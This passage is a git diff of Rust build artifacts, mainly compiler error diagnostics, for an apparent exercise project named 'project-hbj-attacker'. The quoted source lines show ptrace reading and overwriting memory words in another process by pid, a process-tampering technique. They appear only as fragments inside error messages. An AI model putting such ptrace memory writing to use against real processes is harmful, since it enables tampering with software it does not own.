+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..d1a30e5
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/test-bin-project-hbj-attacker
@@ -0,0 +1 @@
+232123ab2ad86765
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..355ee2a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..9d41219
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..310e53f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/output-test-bin-project-hbj-attacker
@@ -0,0 +1,21 @@
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `mem`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":2640,"byte_end":2643,"line_start":93,"line_end":93,"column_start":21,"column_end":24,"is_primary":true,"text":[{"text":" let word_size = mem::size_of::();","highlight_start":21,"highlight_end":24}],"label":"use of unresolved module or unlinked crate `mem`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this module","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::mem;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:93:21\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m93\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let word_size = mem::size_of::();\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this module\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::mem;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":2655,"byte_end":2659,"line_start":93,"line_end":93,"column_start":36,"column_end":40,"is_primary":true,"text":[{"text":" let word_size = mem::size_of::();","highlight_start":36,"highlight_end":40}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:93:36\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m93\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let word_size = mem::size_of::();\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3103,"byte_end":3107,"line_start":105,"line_end":105,"column_start":73,"column_end":77,"is_primary":true,"text":[{"text":" let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };","highlight_start":73,"highlight_end":77}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:105:73\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m105\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3352,"byte_end":3356,"line_start":109,"line_end":109,"column_start":24,"column_end":28,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":28}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing one of these type aliases","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::os::raw::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use core::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `c_long`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":3352,"byte_end":3358,"line_start":109,"line_end":109,"column_start":24,"column_end":30,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":30}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:109:24\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m109\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let new_word = libc::c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing one of these type aliases\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::os::raw::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use core::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if you import `c_long`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m109\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0m let new_word = \u001b[0m\u001b[0m\u001b[38;5;9mlibc::\u001b[0m\u001b[0mc_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m109\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ \u001b[0m\u001b[0m let new_word = c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3483,"byte_end":3487,"line_start":112,"line_end":112,"column_start":43,"column_end":47,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":43,"highlight_end":47}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:112:43\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3504,"byte_end":3508,"line_start":112,"line_end":112,"column_start":64,"column_end":68,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":64,"highlight_end":68}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:112:64\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3570,"byte_end":3574,"line_start":113,"line_end":113,"column_start":53,"column_end":57,"is_primary":true,"text":[{"text":" ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;","highlight_start":53,"highlight_end":57}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:113:53\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m113\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named 